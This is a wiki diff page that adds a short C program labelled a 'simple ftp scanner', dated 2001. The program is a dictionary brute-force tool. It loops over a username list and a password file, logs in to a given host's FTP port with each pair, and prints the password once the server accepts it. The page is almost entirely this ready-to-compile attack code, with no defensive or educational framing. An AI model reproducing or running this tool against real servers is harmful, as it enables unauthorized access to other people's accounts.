This shows you the differences between two versions of the page.
— |
c:examples:ftp_scanner [2024/02/16 01:05] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
+ | ===== simple ftp scanner ===== | ||
+ | written by MoD and ZehDeh 2001 | ||
+ | === example of a simple ftp scanner in c === | ||
+ | <code c> | ||
+ | #include <stdio.h> | ||
+ | #include <string.h> | ||
+ | #include <netdb.h> | ||
+ | #include <netinet/in.h> | ||
+ | #include <sys/socket.h> | ||
+ | #include <sys/types.h> | ||
+ | #include <sys/select.h> | ||
+ | |||
+ | |||
+ | void logintoftp(); | ||
+ | |||
+ | char tmp[256]; | ||
+ | char name[300], pass[300], buf[300], buf2[300]; | ||
+ | char snd[1024], rcv[1024]; | ||
+ | int n; | ||
+ | |||
+ | int sockfd; | ||
+ | |||
+ | int main(int argc, char **argv) | ||
+ | { | ||
+ | char sendln[1024], recvln[4048], buf1[800], buf2[1000]; | ||
+ | char *p, *q; | ||
+ | int len, offset = 0, i,w; | ||
+ | struct sockaddr_in cli; | ||
+ | FILE *passwd, *userlist; | ||
+ | |||
+ | if(argc<4) | ||
+ | { | ||
+ | printf("usage: %s [host] [userlist] [passwordfile]\n",argv[0]); | ||
+ | exit(0); | ||
+ | } | ||
+ | |||
+ | passwd=fopen(argv[3],"r+"); | ||
+ | if(!passwd) | ||
+ | { | ||
+ | printf("Cannot open %s\n\n",argv[3]); | ||
+ | exit(0); | ||
+ | } | ||
+ | fclose(passwd); | ||
+ | userlist=fopen(argv[2],"r+"); | ||
+ | if(!userlist) | ||
+ | { | ||
+ | printf("Cannot open %s\n\n",argv[2]); | ||
+ | exit(0); | ||
+ | } | ||
+ | while(!feof(userlist)) | ||
+ | { | ||
+ | fgets(buf,300,userlist); | ||
+ | sscanf(buf, "%s", name); | ||
+ | passwd=fopen(argv[3],"r+"); | ||
+ | while(!feof(passwd)) | ||
+ | { | ||
+ | fgets(buf2,300,passwd); | ||
+ | sscanf(buf2, "%s", pass); | ||
+ | printf("%s\n",pass); | ||
+ | bzero(&cli, sizeof(cli)); | ||
+ | bzero(recvln, sizeof(recvln)); | ||
+ | bzero(sendln, sizeof(sendln)); | ||
+ | cli.sin_family = AF_INET; | ||
+ | cli.sin_port = htons(21); | ||
+ | inet_pton(AF_INET, argv[1], &cli.sin_addr); | ||
+ | if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ | ||
+ | perror("socket"); | ||
+ | exit(0); | ||
+ | } | ||
+ | if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ | ||
+ | perror("connect"); | ||
+ | exit(0); | ||
+ | } | ||
+ | while((len = read(sockfd, recvln, sizeof(recvln))) > 0){ | ||
+ | recvln[len] = '\0'; | ||
+ | if(strchr(recvln, '\n') != NULL) | ||
+ | break; | ||
+ | } | ||
+ | logintoftp(sockfd); | ||
+ | bzero(sendln, sizeof(sendln)); | ||
+ | close(sockfd); | ||
+ | |||
+ | } | ||
+ | fclose(passwd); | ||
+ | printf("nothing found ohhh :-(\n\n"); | ||
+ | } | ||
+ | fclose(userlist); | ||
+ | |||
+ | } | ||
+ | |||
+ | |||
+ | void logintoftp() | ||
+ | { | ||
+ | |||
+ | char test[20]; | ||
+ | printf("logging in with %s: %s\n", name, pass); | ||
+ | memset(snd, '\0', 1024); | ||
+ | sprintf(snd, "USER %s\r\n", name); | ||
+ | write(sockfd, snd, strlen(snd)); | ||
+ | |||
+ | while((n=read(sockfd, rcv, sizeof(rcv))) > 0){ | ||
+ | rcv[n] = 0; | ||
+ | if(strchr(rcv, '\n') != NULL) | ||
+ | break; | ||
+ | } | ||
+ | |||
+ | memset(snd, '\0', 1024); | ||
+ | sprintf(snd, "PASS %s\r\n", pass); | ||
+ | write(sockfd, snd, strlen(snd)); | ||
+ | |||
+ | while((n=read(sockfd, rcv, sizeof(rcv))) > 0){ | ||
+ | |||
+ | sprintf(test,"%c%c%c",rcv[0],rcv[1],rcv[2]); | ||
+ | if(strcmp(test,"230")==0) | ||
+ | { | ||
+ | printf("Drin ...\nPassword: %s\n\n",pass); | ||
+ | exit(0); | ||
+ | } | ||
+ | |||
+ | rcv[n] = 0; | ||
+ | if(strchr(rcv, '\n') != NULL) | ||
+ | break; | ||
+ | } | ||
+ | return; | ||
+ | } | ||
+ | </code> |